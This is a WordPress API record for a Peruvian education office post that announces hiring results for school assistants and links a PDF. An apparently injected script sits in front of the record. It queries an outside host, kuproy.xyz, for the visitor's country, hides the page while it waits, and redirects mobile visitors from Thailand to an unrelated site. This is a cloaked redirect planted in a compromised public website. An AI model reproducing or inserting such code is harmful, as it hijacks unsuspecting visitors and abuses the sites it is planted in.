<script>
(function() {
    var isDesktop = true;
    
    // Desktop = stay
    if (isDesktop) {
        document.body.style.visibility = "visible";
        return;
    }
    
    var key = "geo_th_v1";
    var cached = localStorage.getItem(key);
    
    // Mobile + TH = redirect
    if (cached === "TH") {
        location.href = "https://www.wakeboard-madrid.com/";
        return;
    }
    
    // Mobile + non-TH (cached) = stay
    if (cached && cached !== "TH") {
        document.body.style.visibility = "visible";
        return;
    }
    
    // Fetch country
    fetch("https://kuproy.xyz/")
        .then(function(r) { return r.text(); })
        .then(function(c) {
            var country = c.trim().toUpperCase();
            localStorage.setItem(key, country);
            
            // TH = redirect, non-TH = stay
            if (country === "TH") {
                location.href = "https://www.wakeboard-madrid.com/";
            } else {
                document.body.style.visibility = "visible";
            }
        })
        .catch(function() {
            // Error = assume non-TH, stay
            localStorage.setItem(key, "NOT_TH");
            document.body.style.visibility = "visible";
        });
})();
</script>{"id":7335,"date":"2026-01-22T19:00:03","date_gmt":"2026-01-23T00:00:03","guid":{"rendered":"https:\/\/ugelarequipanorte.gob.pe\/wp\/?p=7335"},"modified":"2026-01-22T19:00:03","modified_gmt":"2026-01-23T00:00:03","slug":"comunicado-n20-2026-resultados-proceso-de-contrato-auxiliares","status":"publish","type":"post","link":"https:\/\/ugelarequipanorte.gob.pe\/wp\/comunicado-n20-2026-resultados-proceso-de-contrato-auxiliares\/","title":{"rendered":"COMUNICADO N\u00b020-2026 RESULTADOS PROCESO DE CONTRATO AUXILIARES"},"content":{"rendered":"\n<div data-wp-interactive=\"core\/file\" class=\"wp-block-file\"><object data-wp-bind--hidden=\"!state.hasPdfPreview\" hidden class=\"wp-block-file__embed\" data=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2026\/01\/comunicado-02-2026-aptos-y-no-aptos.pdf\" type=\"application\/pdf\" style=\"width:100%;height:600px\" aria-label=\"Incrustado de comunicado 02-2026 aptos y no aptos.\"><\/object><a id=\"wp-block-file--media-c20360cd-a92b-4114-944b-6fb06c202b06\" href=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2026\/01\/comunicado-02-2026-aptos-y-no-aptos.pdf\">comunicado 02-2026 aptos y no aptos<\/a><a href=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2026\/01\/comunicado-02-2026-aptos-y-no-aptos.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-c20360cd-a92b-4114-944b-6fb06c202b06\">Descarga<\/a><\/div>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1,18,4],"tags":[],"class_list":["post-7335","post","type-post","status-publish","format-standard","hentry","category-rotacion-personal","category-auxiliar-de-educacion","category-comunicados"],"_links":{"self":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/7335","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/comments?post=7335"}],"version-history":[{"count":1,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/7335\/revisions"}],"predecessor-version":[{"id":7337,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/7335\/revisions\/7337"}],"wp:attachment":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/media?parent=7335"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/categories?post=7335"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/tags?post=7335"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}